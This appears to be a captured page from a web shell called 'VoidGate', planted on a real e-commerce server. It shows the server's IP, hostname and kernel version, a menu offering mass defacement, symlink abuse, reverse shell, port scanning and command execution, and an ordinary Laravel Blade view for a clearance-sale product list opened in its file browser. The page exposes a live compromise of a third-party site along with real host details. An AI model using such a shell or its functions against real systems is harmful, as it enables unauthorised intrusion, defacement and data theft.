ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 86dfad7e2bc2cf0dc6186c91b5a37cf2.php
<?php if(isset($selectedProducts)): ?> <?php $__currentLoopData = $selectedProducts; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$product): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="col-12 remove-selected-clearance-parent"> <div class="mt-20"> <div class="right-absolute-btn"> <button type="button" class="btn btn-circle p-0 text-danger bg-danger bg-opacity-10 remove-selected-clearance-product" style="--size: 2rem;" data-product-id="<?php echo e($product['id']); ?>"> <i class="fi fi-sr-cross"></i> </button> </div> <div class="media gap-3 p-3 rounded border cursor-pointer justify-content-between align-items-center flex-wrap flex-lg-nowrap" data-id="1"> <div class="d-flex align-items-center gap-3"> <img width="60" height="60" src="<?php echo e(getStorageImages(path:$product->thumbnail_full_url , type: 'backend-basic')); ?>" class="aspect-1 border rounded border" alt=""> <div class="media-body d-flex flex-column gap-1"> <h5 class="product-id" hidden="">1</h5> <h4 class="mb-1 product-name line-1"> <?php echo e($product['name']); ?> </h4> <input type="hidden" name="productIds[]" value="<?php echo e($product->id); ?>"> <div class="fs-12 text-dark d-flex flex-wrap gap-2 flex-column flex-sm-row"> <span class="text-nowrap cat-item border--end"> <span class="opacity-75"> <?php echo e(translate('Price')); ?>: </span> <strong><?php echo e(setCurrencySymbol(usdToDefaultCurrency(amount: $product['unit_price']))); ?></strong> </span> <?php if($product->product_type == 'physical'): ?> <span class="text-nowrap cat-item border--end"> <span class="opacity-75"> <?php echo e(translate('current_stock')); ?>: </span> <?php echo e($product->current_stock); ?> </span> <?php endif; ?> <span class="text-nowrap cat-item border--end"> <span class="opacity-75"> <?php echo e(translate('Category')); ?> : </span> <?php echo e(isset($product->category) ? $product->category->name : translate('category_not_found')); ?> </span> <?php if($product->product_type != 'digital'): ?> <span class="text-nowrap cat-item border--end"> <span class="opacity-75"> <?php echo e(translate('Brand')); ?> :</span> <?php echo e(isset($product->brand) ? $product->brand?->name : translate('brands_not_found')); ?> </span> <?php endif; ?> </div> </div> </div> <?php if(isset($clearanceConfig) && $clearanceConfig->discount_type == 'product_wise'): ?> <div class="d-flex flex-column align-items-end"> <label class="form-label fw-medium fs-12"><?php echo e(translate('Discount Amount')); ?> </label> <div class="input-group"> <input type="number" class="form-control" placeholder="Ex : 10" name="discount_amount[<?php echo e($product->id); ?>]" required> <div class="input-group-append select-wrapper"> <select name="discount_type[<?php echo e($product->id); ?>]" id="" class="form-select shadow-none h-auto border-0"> <option value="percentage">%</option> <option value="flat"><?php echo e(getCurrencySymbol(currencyCode: getCurrencyCode())); ?></option> </select> </div> </div> </div> <?php endif; ?> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endif; ?> <?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/deal/clearance-sale/partials/_select-product.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick